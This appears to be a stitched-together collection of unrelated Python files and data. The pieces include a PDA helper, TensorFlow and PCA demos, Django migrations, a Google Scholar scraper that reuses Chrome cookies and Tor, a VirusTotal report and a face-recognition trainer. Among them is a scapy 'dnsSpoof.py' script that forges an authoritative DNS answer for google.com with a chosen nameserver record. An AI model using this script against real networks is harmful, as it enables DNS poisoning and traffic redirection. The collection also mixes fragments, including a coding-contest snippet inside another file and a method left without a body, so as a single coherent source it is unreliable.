    """Print a legend for the transition table of the PDA in *filename*."""
    # BUG FIX: the parameter was unused -- the heading printed a literal
    # placeholder instead of the file name.
    print(f"Transition table for {filename}")
    # Typos fixed in the legend text ("transtion" -> "transition",
    # "labmda" -> "lambda").
    print("Each cell in the table is comprised of a state to transition on the character in the column as well as the action to perform on the stack.")
    print("Ex: q1 (E/E) under column 'a', would mean to transition to state q1 on a and replace lambda with lambda.")
    print("* Note: Formatting may be off on non-deterministic PDAs with many transitions on one character.")
def get_user_input():
    """Prompt repeatedly until the user enters a non-empty action string."""
    while True:
        choice = input("Enter action: ")
        if choice:
            return choice
def get_user_string():
    """Read the string to feed the PDA; ENTER alone means the empty string."""
    return input("Enter in a string to test (for the empty string only press ENTER): ")
|
import tensorflow as tf

# Tiny graph demo: multiply a (1x6) row vector by a (6x2) ones matrix.
# Uses the TF1 graph/session API (tf.Session); will not run under TF2
# without tf.compat.v1.
a = tf.constant([1, 2, 3, 4, 5, 6], shape=[1, 6])
b = tf.constant([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1], shape=[6, 2])
c = tf.matmul(a, b)

with tf.Session() as sess:
    c = sess.run(c)
    # .eval() works here because the session is the default inside the block.
    print(a.eval())
    print(b.eval())
    print(c)
'''
PCA随机数据
import matplotlib.pyplot as plt
batch_size = 37
seed = 23455
rnd = np.random.RandomState(seed)
def generate():
#生成数据
X = [];Y = []
for i in range(30):
r = np.random.uniform(2, 6)
X.append(r)
for i in range(30):
r = np.random.uniform(5, 8)
Y.append(r)
R = []
for i in range(len(X)):
R.append([X[i],Y[i]])
np.random.shuffle(R)
return R
def printGraph(R,length):
#画图
for i in range(length):
plt.scatter(R[i][0], R[i][1], c='g')
plt.xlim(-5, 10)
plt.ylim(-5, 10)
plt.grid()
plt.show()
def PCAtransfer(Martic):
#PCA算法
#中心化
meanR = np.mean(R, axis=0)
print(meanR)
cen_R = []
for i in range(len(R)):
res = R[i] - meanR
cen_R.append(res)
print(cen_R)
printGraph(cen_R, len(cen_R))
# 求协防差矩阵
cen_Rrr = np.array(cen_R)
cov_R = np.cov(cen_Rrr.T)
print(cov_R.shape)
# 求特征值和特征向量
lambd, features = np.linalg.eig(cov_R)
print(lambd)
print(features)
# KL变换
if lambd[0] > lambd[1]:
maxlambd = 0
else:
maxlambd = 1
print(features[maxlambd])
new_R = cen_R * features[maxlambd].T
printGraph(new_R, len(new_R))
'''
|
#!/usr/bin/env python
# This code is strictly for demonstration purposes.
# If used in any other way or for any other purposes. In no way am I responsible
# for your actions or any damage which may occur as a result of its usage
# dnsSpoof.py
# Author: Nik Alleyne - nikalleyne at gmail dot com
# http://securitynik.blogspot.com
from os import uname
from subprocess import call
from sys import argv, exit
from time import ctime, sleep
from scapy.all import *

# Craft one spoofed DNS answer packet and emit it on the given interface.
# argv[1] = interface to send on, argv[2] = nameserver IP for the NS record.
ip_layer = IP(src='1.2.3.4', dst='1.2.3.4')
udp_layer = UDP(sport=53, dport=123)
dns_layer = DNS(
    id=1, qr=1, opcode=1, aa=1, rd=0, ra=0, z=0, rcode=0,
    qdcount=1, ancount=1, nscount=1, arcount=1,
    qd=DNSQR(qname="google.com", qtype=1, qclass=1),
    an=DNSRR(rrname="google.com", rdata='1.1.1.1', ttl=86400),
    ns=DNSRR(rrname="google.com", type=2, ttl=86400, rdata=argv[2]),
    ar=DNSRR(rrname="google.com", rdata='1.1.1.1'))

frame = Ether() / ip_layer / udp_layer / dns_layer
sendp(frame, iface=argv[1].strip(), count=1)
|
# Generated by Django 2.1.5 on 2019-10-28 10:58
from django.db import migrations, models


class Migration(migrations.Migration):
    """Initial schema: company, holding, sectors, stocks and symbols tables."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Company',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('website', models.URLField(verbose_name='website')),
                ('sector', models.CharField(max_length=50, null=True, verbose_name='sector')),
                ('country', models.CharField(max_length=50, null=True, verbose_name='country')),
                ('symbol', models.CharField(max_length=50, null=True, verbose_name='symbol')),
                ('company', models.CharField(max_length=50, null=True, verbose_name='company')),
                ('industry', models.CharField(max_length=50, null=True, verbose_name='industry')),
                ('CEO', models.CharField(max_length=50, null=True, verbose_name='CEO')),
            ],
            options={
                'db_table': 'company',
            },
        ),
        migrations.CreateModel(
            name='Holding',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('symbol', models.CharField(max_length=15, verbose_name='symbol')),
                ('userName', models.CharField(max_length=50, verbose_name='userName')),
                ('lastPrice', models.FloatField(verbose_name='lastPrice')),
                ('aChange', models.FloatField(verbose_name='aChange')),
                ('pChange', models.FloatField(verbose_name='pChange')),
                ('shares', models.FloatField(verbose_name='shares')),
                ('costBasis', models.FloatField(verbose_name='costBasis')),
                ('marketValue', models.FloatField(verbose_name='marketValue')),
                ('dGain', models.FloatField(verbose_name='dGain')),
                ('tGain', models.FloatField(verbose_name='tGain')),
                ('No', models.FloatField(verbose_name='No')),
                ('date', models.CharField(max_length=50, verbose_name='date')),
            ],
            options={
                'db_table': 'holding',
            },
        ),
        migrations.CreateModel(
            name='Sectors',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('symbol', models.CharField(max_length=50, null=True, verbose_name='symbol')),
                ('sector', models.CharField(max_length=50, null=True, verbose_name='sector')),
            ],
            options={
                'db_table': 'sectors',
            },
        ),
        migrations.CreateModel(
            name='Stocks',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('symbol', models.CharField(max_length=15, verbose_name='symbol')),
                ('date', models.CharField(max_length=50, verbose_name='date')),
                ('start', models.FloatField(verbose_name='start')),
                ('high', models.FloatField(verbose_name='high')),
                ('low', models.FloatField(verbose_name='low')),
                ('close', models.FloatField(verbose_name='close')),
                ('volume', models.BigIntegerField(default=0, verbose_name='volume')),
                ('split', models.FloatField(verbose_name='split')),
                ('dividend', models.FloatField(verbose_name='dividend')),
                ('aChange', models.FloatField(verbose_name='aChange')),
                ('pChange', models.FloatField(verbose_name='pChange')),
            ],
            options={
                'db_table': 'stocks',
                'ordering': ['-date'],
            },
        ),
        migrations.CreateModel(
            name='Symbols',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('symbol', models.CharField(max_length=50, null=True, verbose_name='symbol')),
            ],
            options={
                'db_table': 'symbols',
            },
        ),
    ]
|
# Generated by Django 3.0.5 on 2020-05-11 23:35
from django.db import migrations


class Migration(migrations.Migration):
    """Drop the Appointment.attorney relation."""

    dependencies = [
        ('appointments', '0008_auto_20200510_1654'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='appointment',
            name='attorney',
        ),
    ]
|
# -*- coding: utf-8 -*-
import os, logging, re, traceback, sys
import requests
import time
#
import browsercookie
#
import settings
from bs4 import BeautifulSoup
from torrequest import TorRequest

# Module-level logger and a shared HTTP session seeded with the cookies of
# the local Chrome profile.
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
SESSION = requests.Session()
SESSION.cookies = browsercookie.chrome()
def _update_cookies():
    """Refresh SESSION's cookie jar from the local Chrome profile."""
    fresh_jar = browsercookie.chrome()
    SESSION.cookies = fresh_jar
def get_path_of_pdfs():
    """Return every non-empty ``*.pdf`` under settings.PDFS_PATH, sorted."""
    pdf_paths = []
    for root, _dirs, filenames in os.walk(settings.PDFS_PATH):
        for filename in filenames:
            full = os.path.join(root, filename)
            if filename.endswith('.pdf') and os.path.getsize(full) > 0:
                pdf_paths.append(full)
    return sorted(pdf_paths)
# Region for work with good cookies
# Google auth cookies that must survive del_gs_cookies().
DONT_TOUCH_KEYS_IN_COOKIES = ['SSID', 'SID', 'HSID']
def del_gs_cookies():
    """Remove Google Scholar cookies and most google.com cookies from SESSION.

    Cookies named in DONT_TOUCH_KEYS_IN_COOKIES are kept. Returns the
    session's cookie jar.
    """
    logger.debug("Start delete cookies for google.com and google scholar")
    jar = SESSION.cookies._cookies  # NOTE: relies on requests' private cookie layout
    if jar.get('.scholar.google.com'):
        del jar['.scholar.google.com']
        logger.debug("Delete cookies for google scholar")
    if jar.get('.google.com'):
        for key in list(jar['.google.com']['/'].keys()):
            if key not in DONT_TOUCH_KEYS_IN_COOKIES:
                del jar['.google.com']['/'][key]
        logger.debug("Delete cookies for google.com")
    return SESSION.cookies
def get_request(url, att_file=None, using_TOR=False):
    """Fetch *url* and return the response body text, retrying on failure.

    NOTE(review): despite the name, this issues a POST (SESSION.post /
    TorRequest.post), not a GET -- confirm callers rely on POST semantics.

    Args:
        url: target URL.
        att_file: optional file payload passed as ``files=`` to the request.
        using_TOR: when True, route the request through a local Tor process.

    Returns:
        The response text on HTTP 200, or None once all retries are spent.

    Raises:
        Exception: on a non-200 HTTP status (not retried).
    """
    retry = settings.DEFAULT_MAX_RETRIES
    while retry > 0:
        try:
            try:
                if using_TOR:
                    with TorRequest(tor_app=r".\Tor\tor.exe") as tr:
                        response = tr.post(url=url, files=att_file, cookies=SESSION.cookies, timeout=settings.DEFAULT_TIMEOUT)
                        # Adopt cookies issued through the Tor circuit.
                        SESSION.cookies = response.cookies
                else:
                    response = SESSION.post(url=url, files=att_file, timeout=settings.DEFAULT_TIMEOUT)
            except requests.exceptions.Timeout:
                logging.debug("timeout from requests")
                settings.print_message("timeout from requests", 2)
                # Re-raised as ConnectionError so the retry loop below handles it.
                raise ConnectionError("request timeout after %d seconds" % settings.DEFAULT_TIMEOUT)
            except requests.exceptions.RequestException as e:
                raise ConnectionError("request exception: %s" % e)
            if response.status_code == 200:
                return response.text
            else:
                # Non-200 status is fatal: propagates to the caller, no retry.
                raise Exception("HTTP %d - %s" % (response.status_code, response.reason))
        except ConnectionError as error:
            retry = retry - 1
            settings.print_message("ran into connection error: '%s'" % error, 2)
            logging.info("ran into connection error: '%s'" % error)
            if retry > 0:
                settings.print_message("retrying in %d seconds" % settings.DEFAULT_SLEEP, 2)
                logging.info("retrying in %d seconds" % settings.DEFAULT_SLEEP)
                time.sleep(settings.DEFAULT_SLEEP)
            else:
                retry = 0
    # Retries exhausted: reset Google cookies; falls through returning None.
    del_gs_cookies()
def get_soup(url, using_TOR=False):
    """Return a BeautifulSoup for *url*, or None if the fetch came back empty.

    Exceptions raised while fetching or parsing propagate to the caller.
    """
    # Cleanup: the original wrapped this in a try/except that only re-raised,
    # and had an unreachable `return None` after the bare `raise`.
    request = get_request(url, using_TOR=using_TOR)
    if request is None:
        logger.debug("Request is empty, don't create soup.")
        return None
    return BeautifulSoup(request, 'html.parser')
def get_about_count_results(soup):
    """Extract the approximate result count from a Google Scholar page.

    Reads the "About N results" summary line; falls back to counting the
    result headings when the summary is absent or unparsable.
    """
    title = soup.find('div', {'id': 'gs_ab_md'})
    if title:
        title = title.find('div', {'class': 'gs_ab_mdw'})
    if title:
        count_papers = title.text
        if count_papers:
            # Summary usually reads "About 1,234 results" -> take the number.
            count_papers = count_papers.split(' ')[1].replace(',', '')
        else:
            count_papers = len(soup.find_all('h3', class_="gs_rt"))
        try:
            int(count_papers)
        except (ValueError, TypeError):
            # Narrowed from a bare `except:`. Some layouts put the number
            # first ("1,234 results"), so retry with the first token.
            count_papers = title.text.split(' ')[0].replace(',', '')
    else:
        count_papers = len(soup.find_all('h3', class_="gs_rt"))
    return int(count_papers)
def get_count_from_scholar(title, using_TOR=False):
    """Search Google Scholar for *title* (quoted) and return the hit count."""
    query_url = settings.SCHOLAR_SEARCH.format('"{}"'.format(title))
    soup = get_soup(query_url, using_TOR=using_TOR)
    return get_about_count_results(soup)
# Read problem input: D problem tiers, goal score G, then (points, bonus)
# per tier, collected into P and C.
D, G = map(int, input().split())

# BUG FIXES:
#  * G/100 is a float in Python 3 and breaks list multiplication / range();
#    integer division is intended.
#  * P and C were appended to without ever being defined.
DP = [0 for i in range(G // 100 + 1)]
P = []
C = []
for i in range(D):
    p, c = map(int, input().split())
    P.append(p)
    C.append(c)
|
#!/usr/bin/env python3
# coding=utf-8

"""The setup script."""
from setuptools import setup, find_packages

# Long description is the README followed by the change history.
with open("README.rst") as readme_file:
    readme = readme_file.read()

with open("HISTORY.rst") as history_file:
    history = history_file.read()

# Read the version without importing the package (avoids import side effects).
version = {}
with open("./pancakes/version.py") as version_file:
    exec(version_file.read(), version)

requirements = ["Click>=6.0"]
setup_requirements = ["pytest-runner"]
test_requirements = ["pytest"]

setup(
    author="Michael B",
    author_email="online.alias.mb@me.com",
    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        # How mature is this project? Common values are
        #   2 - Pre-Alpha
        #   3 - Alpha
        #   4 - Beta
        #   5 - Production/Stable
        "Development Status :: 2 - Pre-Alpha",
        # Indicate who your project is intended for
        "Intended Audience :: Developers",
        # Pick your license as you wish (should match "license" above)
        "License :: OSI Approved :: MIT License",
        "Natural Language :: English",
        # Specify the Python versions you support here. In particular, ensure
        # that you indicate whether you support Python 2, Python 3 or both.
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.7",
        # Topic
        "Topic :: Software Development :: Libraries :: Python Modules",
        "Topic :: Utilities",
    ],
    description="Pancake making utility",
    entry_points={"console_scripts": ["pancakes=pancakes.cli:main"]},
    install_requires=requirements,
    # Choose your license
    license="MIT license",
    long_description=readme + "\n\n" + history,
    include_package_data=True,
    keywords="pancakes",
    name="pancakes",
    packages=find_packages(include=["pancakes"]),
    setup_requires=setup_requirements,
    test_suite="tests",
    tests_require=test_requirements,
    url="https://github.com/gloc-mike/pancakes",
    version=version['__version__'],
    zip_safe=False,
)
|
import os, rasterio
import xarray as xr
import geopandas as gpd
from shapely.geometry import Point
import pandas as pd
import numpy as np
from affine import Affine
import datetime

# Sample freeze-up / break-up (FUBU) climatology rasters at shapefile point
# locations and write the average calendar date per metric/region to CSV.
base_path = '/atlas_scratch/malindgren/nsidc_0051'
out_dict = {}
metrics = ['freezeup_start','freezeup_end','breakup_end','breakup_start']
points_regions = ['barrow', 'chuckchi', 'beaufort', 'cb']

for points_region in points_regions:
    for window_len in ['paper_weights']:
        # with xr.open_dataset('/atlas_scratch/malindgren/nsidc_0051/NetCDF/nsidc_0051_sic_nasateam_1978-2017_Alaska_hann_{}.nc'.format(str(window_len))) as tmp:
        #     a = Affine(*eval( tmp.affine_transform )[:6]) # make an affine transform for lookups
        # Load one climatology array per metric, keeping the raster's affine
        # transform for coordinate -> pixel lookups.
        ds_sel = {}
        for metric in metrics:
            # fn = '/atlas_scratch/malindgren/nsidc_0051/outputs/{}_avg_allyears_ordinal_hann_{}_climatology.tif'.format(metric, str(window_len))
            fn = '/atlas_scratch/malindgren/nsidc_0051/outputs/{}_avg_daily-clim_ordinal_hann_{}.tif'.format( metric, str(window_len) )
            with rasterio.open( fn ) as rst:
                arr = rst.read(1)
                a = rst.transform
                ds_sel[metric] = arr
        # read points and get their row/col locs
        if points_region == 'cb':
            # 'cb' is the union of the Chukchi and Beaufort point sets.
            points_fn1 = os.path.join(base_path,'selection_points','{}_points.shp'.format('chuckchi'))
            points_fn2 = os.path.join(base_path,'selection_points','{}_points.shp'.format('beaufort'))
            points1 = gpd.read_file( points_fn1 ).geometry.apply(lambda x: (x.x, x.y)).tolist()
            points2 = gpd.read_file( points_fn2 ).geometry.apply(lambda x: (x.x, x.y)).tolist()
            points = points1+points2
        else:
            points_fn = os.path.join(base_path,'selection_points','{}_points.shp'.format(points_region))
            points = gpd.read_file( points_fn ).geometry.apply(lambda x: (x.x, x.y)).tolist()
        # Inverse affine maps (x, y) -> fractional (col, row); truncate to ints.
        colrows = [ ~a*pt for pt in points ]
        colrows = [ (int(c),int(r)) for c,r in colrows ]
        # NOTE(review): colrows holds (col, row) pairs, so these unpackings
        # swap the names; both lists are unused below -- confirm and remove.
        cols = [ c for r,c in colrows ]
        rows = [ r for r,c in colrows ]
        out_vals = {}
        for metric in metrics:
            out = ds_sel[metric].copy()
            out[np.where(out < 0)] = np.nan # set any -9999 vals from FUBU processing to np.nan
            # out = out.mean('year') # make an average
            # Average the ordinal day across the points, then convert to a
            # calendar date (2007 is an arbitrary non-leap reference year).
            day = np.mean([ out[r,c] for c,r in colrows ]).round(0)
            date = datetime.datetime(2007, 1, 1) + datetime.timedelta(int(day))
            out_vals[metric] = date.strftime('%m-%d')
        out_dict[window_len] = out_vals
    # dump to disk (one CSV per region)
    df = pd.DataFrame(out_dict)
    df = df.loc[metrics] # sort the rows?
    df.to_csv('/atlas_scratch/malindgren/nsidc_0051/{}_FUBU_average_date_daily-clim.csv'.format(points_region))
|
import scrape_mars

# Run the Mars news scraper once and show the result it returns.
scrape = scrape_mars.news_scrape()
print(scrape)
|
import logging

# Package-level logger; the NullHandler avoids "no handler found" warnings
# when the host application configures logging itself.
log = logging.getLogger('onegov.agency')
log.addHandler(logging.NullHandler())

from onegov.agency.i18n import _
from onegov.agency.app import AgencyApp

# Explicit public API of the package.
__all__ = (
    '_',
    'AgencyApp',
    'log',
)
|
#!/usr/bin/env python
# Author: Jin Lee (leepc12@gmail.com)
import sys
import os
import argparse
from encode_lib_common import (
log,
ls_l,
mkdir_p,
rm_f,
)
from encode_lib_genomic import (
bam_to_pbam,
)
def parse_arguments():
    """Parse command-line arguments for the BAM -> pBAM converter.

    Also applies the requested log level and logs the invocation.
    """
    parser = argparse.ArgumentParser(prog='ENCODE bam to pbam',
                                     description='')
    parser.add_argument('bam', type=str,
                        help='Path for BAM.')
    parser.add_argument('--ref-fa', type=str,
                        help='Path for reference fasta.')
    parser.add_argument('--delete-original-bam', action='store_true',
                        help='Delete original BAM after conversion.')
    parser.add_argument('--out-dir', default='', type=str,
                        help='Output directory.')
    # FIX: 'CRITICAL' was listed twice in choices; deduplicated and ordered
    # by severity.
    parser.add_argument('--log-level', default='INFO',
                        choices=['NOTSET', 'DEBUG', 'INFO',
                                 'WARNING', 'ERROR', 'CRITICAL'],
                        help='Log level')
    args = parser.parse_args()

    log.setLevel(args.log_level)
    log.info(sys.argv)
    return args
def main():
    """Convert a BAM into a pBAM, optionally deleting the source BAM."""
    # read params
    args = parse_arguments()

    log.info('Initializing and making output directory...')
    mkdir_p(args.out_dir)

    # Convert the BAM (the original comment here mentioned a "read length
    # file", which is not what this step does).
    log.info('Converting BAM into pBAM...')
    bam_to_pbam(args.bam, args.ref_fa, args.out_dir)

    if args.delete_original_bam:
        log.info('Deleting original BAM...')
        rm_f(args.bam)

    log.info('List all files in output directory...')
    ls_l(args.out_dir)

    log.info('All done.')
if __name__ == '__main__':
    # Script entry point.
    main()
|
{
"scan_id": "f96e0fe3e21246e3a1cae6d3f59725f2c387f040009766fdfeb11d75487d3e35-1528131725",
"resource": "f96e0fe3e21246e3a1cae6d3f59725f2c387f040009766fdfeb11d75487d3e35",
"scan_date": "2018-06-04 17:02:05",
"permalink": "https://www.virustotal.com/file/f96e0fe3e21246e3a1cae6d3f59725f2c387f040009766fdfeb11d75487d3e35/analysis/1528131725/",
"verbose_msg": "Scan finished, information embedded",
"sha1": "6b2a323ee60be14ae04df36b4a724bbcd67ba2c8",
"md5": "0c7391ea74f33c858ad04c99f188ed7a",
"sha256": "f96e0fe3e21246e3a1cae6d3f59725f2c387f040009766fdfeb11d75487d3e35",
"response_code": 1,
"positives": 0,
"total": 60,
"scans": {
"Bkav": {
"detected": false,
"version": "1.3.0.9466",
"result": null,
"update": "20180604"
},
"TotalDefense": {
"detected": false,
"version": "37.1.62.1",
"result": null,
"update": "20180604"
},
"MicroWorld-eScan": {
"detected": false,
"version": "14.0.297.0",
"result": null,
"update": "20180604"
},
"nProtect": {
"detected": false,
"version": "2018-06-04.02",
"result": null,
"update": "20180604"
},
"CMC": {
"detected": false,
"version": "1.1.0.977",
"result": null,
"update": "20180604"
},
"CAT-QuickHeal": {
"detected": false,
"version": "14.00",
"result": null,
"update": "20180604"
},
"McAfee": {
"detected": false,
"version": "6.0.6.653",
"result": null,
"update": "20180604"
},
"Malwarebytes": {
"detected": false,
"version": "2.1.1.1115",
"result": null,
"update": "20180604"
},
"VIPRE": {
"detected": false,
"version": "67028",
"result": null,
"update": "20180604"
},
"TheHacker": {
"detected": false,
"version": "6.8.0.5.3045",
"result": null,
"update": "20180531"
},
"K7GW": {
"detected": false,
"version": "10.48.27354",
"result": null,
"update": "20180604"
},
"K7AntiVirus": {
"detected": false,
"version": "10.48.27354",
"result": null,
"update": "20180604"
},
"Baidu": {
"detected": false,
"version": "1.0.0.2",
"result": null,
"update": "20180604"
},
"NANO-Antivirus": {
"detected": false,
"version": "1.0.106.22618",
"result": null,
"update": "20180604"
},
"Cyren": {
"detected": false,
"version": "6.0.0.4",
"result": null,
"update": "20180604"
},
"Symantec": {
"detected": false,
"version": "1.6.0.0",
"result": null,
"update": "20180604"
},
"ESET-NOD32": {
"detected": false,
"version": "17497",
"result": null,
"update": "20180604"
},
"TrendMicro-HouseCall": {
"detected": false,
"version": "9.950.0.1006",
"result": null,
"update": "20180604"
},
"Avast": {
"detected": false,
"version": "18.4.3895.0",
"result": null,
"update": "20180604"
},
"ClamAV": {
"detected": false,
"version": "0.99.2.0",
"result": null,
"update": "20180604"
},
"GData": {
"detected": false,
"version": "A:25.17313B:25.12413",
"result": null,
"update": "20180604"
},
"Kaspersky": {
"detected": false,
"version": "15.0.1.13",
"result": null,
"update": "20180604"
},
"BitDefender": {
"detected": false,
"version": "7.2",
"result": null,
"update": "20180604"
},
"Babable": {
"detected": false,
"version": "9107201",
"result": null,
"update": "20180406"
},
"ViRobot": {
"detected": false,
"version": "2014.3.20.0",
"result": null,
"update": "20180604"
},
"AegisLab": {
"detected": false,
"version": "4.2",
"result": null,
"update": "20180604"
},
"Rising": {
"detected": false,
"version": "25.0.0.1",
"result": null,
"update": "20180604"
},
"Ad-Aware": {
"detected": false,
"version": "3.0.5.370",
"result": null,
"update": "20180604"
},
"Sophos": {
"detected": false,
"version": "4.98.0",
"result": null,
"update": "20180604"
},
"Comodo": {
"detected": false,
"version": null,
"result": null,
"update": "20180604"
},
"F-Secure": {
"detected": false,
"version": "11.0.19100.45",
"result": null,
"update": "20180604"
},
"DrWeb": {
"detected": false,
"version": "7.0.28.2020",
"result": null,
"update": "20180604"
},
"Zillya": {
"detected": false,
"version": "2.0.0.3566",
"result": null,
"update": "20180604"
},
"TrendMicro": {
"detected": false,
"version": "10.0.0.1040",
"result": null,
"update": "20180604"
},
"McAfee-GW-Edition": {
"detected": false,
"version": "v2017.2786",
"result": null,
"update": "20180604"
},
"Emsisoft": {
"detected": false,
"version": "4.0.2.899",
"result": null,
"update": "20180604"
},
"F-Prot": {
"detected": false,
"version": "4.7.1.166",
"result": null,
"update": "20180604"
},
"Jiangmin": {
"detected": false,
"version": "16.0.100",
"result": null,
"update": "20180604"
},
"Webroot": {
"detected": false,
"version": "1.0.0.403",
"result": null,
"update": "20180604"
},
"Avira": {
"detected": false,
"version": "8.3.3.6",
"result": null,
"update": "20180604"
},
"Antiy-AVL": {
"detected": false,
"version": "3.0.0.1",
"result": null,
"update": "20180604"
},
"Kingsoft": {
"detected": false,
"version": "2013.8.14.323",
"result": null,
"update": "20180604"
},
"Arcabit": {
"detected": false,
"version": "1.0.0.831",
"result": null,
"update": "20180604"
},
"SUPERAntiSpyware": {
"detected": false,
"version": "5.6.0.1032",
"result": null,
"update": "20180604"
},
"ZoneAlarm": {
"detected": false,
"version": "1.0",
"result": null,
"update": "20180604"
},
"Avast-Mobile": {
"detected": false,
"version": "180604-04",
"result": null,
"update": "20180604"
},
"Microsoft": {
"detected": false,
"version": "1.1.14901.4",
"result": null,
"update": "20180604"
},
"AhnLab-V3": {
"detected": false,
"version": "3.12.1.20996",
"result": null,
"update": "20180604"
},
"ALYac": {
"detected": false,
"version": "1.1.1.5",
"result": null,
"update": "20180604"
},
"AVware": {
"detected": false,
"version": "1.5.0.42",
"result": null,
"update": "20180604"
},
"MAX": {
"detected": false,
"version": "2017.11.15.1",
"result": null,
"update": "20180604"
},
"VBA32": {
"detected": false,
"version": "3.12.32.0",
"result": null,
"update": "20180604"
},
"Zoner": {
"detected": false,
"version": "1.0",
"result": null,
"update": "20180604"
},
"Tencent": {
"detected": false,
"version": "1.0.0.1",
"result": null,
"update": "20180604"
},
"Yandex": {
"detected": false,
"version": "5.5.1.3",
"result": null,
"update": "20180529"
},
"Ikarus": {
"detected": false,
"version": "0.1.5.2",
"result": null,
"update": "20180604"
},
"Fortinet": {
"detected": false,
"version": "5.4.247.0",
"result": null,
"update": "20180604"
},
"AVG": {
"detected": false,
"version": "18.4.3895.0",
"result": null,
"update": "20180604"
},
"Panda": {
"detected": false,
"version": "4.6.4.2",
"result": null,
"update": "20180604"
},
"Qihoo-360": {
"detected": false,
"version": "1.0.0.1120",
"result": null,
"update": "20180604"
}
}
} |
import os
import cv2
import numpy as np
import time
import copy
import cv2
import json
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader, Dataset
from torch.optim import lr_scheduler
from torchvision import datasets
from facenet_pytorch import InceptionResnetV1, MTCNN
from PIL import Image
from torchvision import transforms
from torchvision.transforms import ToTensor, Resize, Normalize
from torchvision import utils
from torchvision import datasets, models, transforms
from tqdm import tqdm
from torch.utils.data import TensorDataset, random_split
from data_collector import DataCollector
class FaceRecognitionClassifier():
    """Face-identity classifier: frozen InceptionResnetV1 backbone plus a
    trainable linear head (ModifiedResnet).

    Relies on three files in the working directory:
      * facedict.json     -- maps class indices (as strings) to person names
      * training_data.npy -- rows of (image, label) pairs; rebuilt on demand
      * mod_resnet.pth    -- trained head weights written by train_classifier()
    """

    def __init__(self):
        # Run on the GPU when one is available.
        if torch.cuda.is_available():
            self.device = torch.device('cuda:0')
        else:
            self.device = torch.device('cpu')
        print(f'Recognition module is running on {self.device}')
        with open('facedict.json') as json_file:
            self.facedict = json.load(json_file)
        # NOTE(review): labels_count is never read; the label count actually
        # used everywhere is len(self.facedict). Kept for compatibility.
        self.labels_count = 3
        self.pretrained_model = InceptionResnetV1(pretrained='vggface2')
        self.model = None

    def get_model(self):
        """Load trained head weights from 'mod_resnet.pth' and cache the model.

        :return: the loaded ModifiedResnet in eval mode on self.device.
        :raises FileNotFoundError: if the weights file does not exist yet.
        """
        model = ModifiedResnet(pretrained_model=self.pretrained_model, labels_count=len(self.facedict))
        model.load_state_dict(torch.load('mod_resnet.pth'))
        model.eval()
        model.to(self.device)
        self.model = model
        return model

    def train_classifier(self, num_epochs=50):
        """Train the classification head and checkpoint the best weights.

        The backbone is frozen; only ModifiedResnet's output layer learns.
        The best (by validation accuracy) state dict is saved to
        'mod_resnet.pth'.

        :param num_epochs: number of training epochs.
        :return: the ModifiedResnet with the best weights loaded.
        """
        try:
            training_data = np.load('training_data.npy', allow_pickle=True)
        except FileNotFoundError:
            # No dataset on disk yet -- collect one, then retry.
            # Bug fix: the original bound the class object itself
            # (dc = DataCollector) instead of creating an instance.
            dc = DataCollector()
            dc.collect_data()
            training_data = np.load('training_data.npy', allow_pickle=True)
        images = torch.Tensor([i[0] for i in training_data])
        labels = torch.Tensor([i[1] for i in training_data])
        dataset = TensorDataset(images, labels)
        # 80/20 train/validation split.
        train_size = int(0.8 * len(dataset))
        val_size = len(dataset) - train_size
        train_dataset, val_dataset = random_split(dataset, [train_size, val_size])
        train_loader = DataLoader(train_dataset, batch_size=32, shuffle=True)
        val_loader = DataLoader(val_dataset, batch_size=32, shuffle=True)
        dataloaders = {'train': train_loader, 'val': val_loader}
        dataset_sizes = {'train': train_size, 'val': val_size}
        # Freeze the backbone so only the new head is optimized.
        for param in self.pretrained_model.parameters():
            param.requires_grad = False
        modified_resnet = ModifiedResnet(pretrained_model=self.pretrained_model, labels_count=len(self.facedict))
        modified_resnet.to(self.device)
        criterion = nn.CrossEntropyLoss()
        optimizer = optim.AdamW(modified_resnet.parameters(), lr=0.001)
        scheduler = lr_scheduler.StepLR(optimizer, step_size=7, gamma=0.1)
        since = time.time()
        best_model_wts = copy.deepcopy(modified_resnet.state_dict())
        best_acc = 0.0
        for epoch in tqdm(range(num_epochs)):
            print(f'Epoch {epoch}/{num_epochs - 1}')
            for phase in ['train', 'val']:
                if phase == 'train':
                    modified_resnet.train()
                else:
                    modified_resnet.eval()
                running_loss = 0.0
                running_corrects = 0
                for inputs, labels in dataloaders[phase]:
                    inputs = inputs.to(self.device)
                    labels = labels.long().to(self.device)
                    optimizer.zero_grad()
                    # Track gradients only during the training phase.
                    with torch.set_grad_enabled(phase == 'train'):
                        outputs = modified_resnet(inputs)
                        _, preds = torch.max(outputs, 1)
                        loss = criterion(outputs, labels)
                        if phase == 'train':
                            loss.backward()
                            optimizer.step()
                    running_loss += loss.item() * inputs.size(0)
                    running_corrects += torch.sum(preds == labels)
                if phase == 'train':
                    scheduler.step()
                epoch_loss = running_loss / dataset_sizes[phase]
                epoch_acc = running_corrects.double() / dataset_sizes[phase]
                print(f'{phase} Loss: {epoch_loss:.4f} Acc: {epoch_acc:.4f}')
                # Checkpoint whenever validation accuracy improves.
                if phase == 'val' and epoch_acc > best_acc:
                    best_acc = epoch_acc
                    best_model_wts = copy.deepcopy(modified_resnet.state_dict())
                    torch.save(best_model_wts, 'mod_resnet.pth')
        time_elapsed = time.time() - since
        print(f'Training complete in {time_elapsed // 60}m {time_elapsed % 60}s')
        print(f'Best val Acc: {best_acc}')
        # Return the best checkpoint, not the last epoch's weights.
        modified_resnet.load_state_dict(best_model_wts)
        return modified_resnet

    def recognize(self, face):
        """Classify a single preprocessed face tensor.

        :param face: tensor of shape (C, H, W) -- assumes the same
            preprocessing as the training images; TODO confirm with caller.
        :return: (person_name, confidence) for the most likely class.
        """
